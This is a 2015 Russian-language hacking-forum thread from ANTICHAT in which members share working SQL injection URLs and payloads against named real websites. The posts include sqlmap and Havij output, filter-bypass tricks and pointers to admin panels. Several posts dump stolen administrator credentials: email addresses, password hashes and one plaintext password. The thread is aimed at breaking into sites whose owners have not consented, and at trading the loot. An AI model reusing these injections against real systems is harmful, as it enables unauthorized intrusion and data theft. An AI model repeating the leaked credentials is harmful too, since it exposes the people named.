ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.07.2015, 15:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
9212
Репутация:
1
|
|
Сообщение от goot
goot said:
↑
Привет все!
Дырка есть базу выдает но там joomla 3.3.1 хеш с солью высыпает
И фильтр не пропускает логин админа(((
Код:
Code:
http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=1'
Там только перебор бессмысленный сразу инжектировать нужно
Я через софт Havij v1.16 скачал базу
Код:
Code:
Target: http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=%Inject_Here%
Host IP: 91.236.136.194
Web Server: nginx
DB Server: MySQL error based
Resp. Time(avg): 85 ms
Sql Version: 5.5.43-0+deb7u1-log
Compile OS: debian-linux-gnu
Host Name: ura.webhost1.ru
Current DB: sergei62_og
Installation dir: /usr
данные админа
povar.admin@gmail.com
$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO
Залить не получилось(( не нашел пути
Кто сможет раскопать отпишите в личку (Как удалось?)
P.S. на сервере фильтрация на количество запросов в минуту! Так что не спишите))) Хэш очень похож на OpenBSD Blowfish
Логин подозреваю будет Admin
Вот что удалось вытянуть,подозреваю уже кто-то залез в админку
coolxacer@list.ru:$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO!
povar.admin@gmail.com:$2y$10$.qPZfqEzdniT1gOnrmQGWeZ9ZRikV1ic4aFrCmRUCW Fk4u9wVBkqC!
Вот что удалось найти по типу таких хэшей,ничего не понял ,но может кому пригодится http://habrahabr.ru/post/211645/
Код:
Code:
http://dir.rusmedserv.com/index.php?t=sub_pages&cat=-4+UNION+SELECT+1,2,user(),4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Ну и бонусВот интерестная inject. дальше не получатся залезть,если есть идеи в ПМ пож.
|
|
|
|
01.08.2015, 13:53
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
btc
Код:
Code:
Post[URL]: http://www.vitalcoin.com/order_ajax_request.php
Post[data]: Action=IsUserLogedIn&TransactionMode=2&TransactionType=PKR and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
Код:
Code:
Warning: mysql_query(): Unable to save result set in /home/vitalcoi/public_html/models/order.php on line 88
Duplicate entry '~'vitalcoi_dbuser@localhost'~1' for key 'group_key'
Код:
Code:
Админка под Basic
UserID,UserName,Password=16^kitharass^56c87d0571ee5a4da6793583164da8f4:kitharass@gmail.com
UserID,UserName,Password=14^admin^Vital!@#:faag786@gmail.com
UserID,UserName,Password=15^maria^55913d077666fa9d9b5a0a35c718ba38
|
|
|
04.08.2015, 16:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
35015
Репутация:
57
|
|
Код:
Code:
www.meleeboys.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'
',password),222+from+jos_users--%20-
www.skala-club.vn.ua/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'
',password),222+from+jos_users--%20-
toxic.h5n1.free.fr/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'
',password),222+from+jos_users--%20-
|
|
|
|
04.08.2015, 16:32
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
Код:
Code:
http://casu.us/online_programs.php?id=-1+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5--
5.0.96-log
casuni@184.168.152.78
casuni
Powered By: Friends IT Solution (дырявые все)
Пробую их самих разобрать. |
|
|
|
05.08.2015, 13:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
The NORTH FACE
Код:
Code:
http://north-face.com.ua/search/?searh=%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27
Версия: 5.5.42-37.1
|
|
|
|
06.08.2015, 17:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
216062
Репутация:
231
|
|
www.nowinstock.net трафф 580к
Код:
Code:
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.nowinstock.net:80/view_cache.php?lid=1 RLIKE (SELECT (CASE WHEN (2936=2936) THEN 1 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: http://www.nowinstock.net:80/view_cache.php?lid=1 AND EXTRACTVALUE(4360,CONCAT(0x5c,0x71786a6a71,(SELECT (ELT(4360=4360,1))),0x71626a7071))
---
web application technology: Apache
back-end DBMS: MySQL 5.1
База sdfs4f_main
|
|
|
|
08.08.2015, 19:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
9212
Репутация:
1
|
|
Код:
Code:
http://www.pourmaplanete.com/news/novel.php?ID=-151+UNION SELECT 1,user(),version(),4,5,6,7,8,9,10,database(),12,13--
http://www.tovary2.ru/a-general.php?id_gorod=-74+UNION SELECT 1,2,3,4,5,6,version(),user(),9,10,11,12,13,14,15,16,17,database(),19,20,21,22,23,24,25,26,27,28--
http://velostar.ru/guest.php?active_page=-1500+union+select+1,2,3,4,5,version(),7,8--
Вывод в title
|
|
|
|
16.08.2015, 16:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
216062
Репутация:
231
|
|
papersource.com трафф 430к
Код:
Code:
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.papersource.com:80/personalized/wedding-save-the-dates/digital-1photo--photo-save-the-dates/1' RLIKE (SELECT (CASE WHEN (4297=4297) THEN 1 ELSE 0x28 END)) AND 'DiTO'='DiTO.html
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: http://www.papersource.com:80/personalized/wedding-save-the-dates/digital-1photo--photo-save-the-dates/1' AND EXTRACTVALUE(1565,CONCAT(0x5c,0x71626a6b71,(SELECT (ELT(1565=1565,1))),0x716a787871)) AND 'DncI'='DncI.html
back-end DBMS: MySQL >= 5.0.0
databases:
paper |
|
|
|
25.08.2015, 22:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
61136
Репутация:
32
|
|
Код:
Code:
http://testmat.ru/mat_test.php?id=-2+union+select+1,2,3,4,user,password,7,8,9,10,11,12+from+users+--+
Код:
Code:
http://www.yarohranatruda.ru/order.php?id=-377%27+union+select+1,admin_name,admin_passwd,4,5+FrOm+admin+--+
Админка
Код:
Code:
http://www.yarohranatruda.ru/admin/
Код:
Code:
http://russkayabronza.com/1/order.php?id=-866'+union+select+1,2,3,4,5,6,7,8,9+--+
Админка
Код:
Code:
http://russkayabronza.com/adm.php
|
|
|
|
31.08.2015, 21:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
54593
Репутация:
0
|
|
Код:
Code:
http://koreamed.org/JournalVolume.php?id=-200+union+select+user%28%29--
использовал вкупе с sqlmap
[*] information_schema
[*] KoreaMed
[*] test
Адовое количество таблиц, возиться не стал.
Код:
Code:
http://www.findfilehost.com/filehost.php?id=-2+UNION%20+select%20+%20%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
режет mod_secure
Код:
Code:
http://www.jamrid.com/RiddimDetail.php?ID=-1677+union+select+1,convert%28concat_ws%280x3a3a,version%28%29,user%28%29,database%28%29%29+using+latin1%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Проблема с кодировкой, неверно выводит и просто вывести version() нельзя. Нужно воспользоваться фукцией convert()
convert(version()+using+latin1)
в итоге есть:
4.1.14::soundman@localhost::RiddimDB |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?3875238){kind=avatar}
![Отправить сообщение для K1nD[e]R с помощью ICQ](fusion/misc/im_icq.gif)
Линейный вид
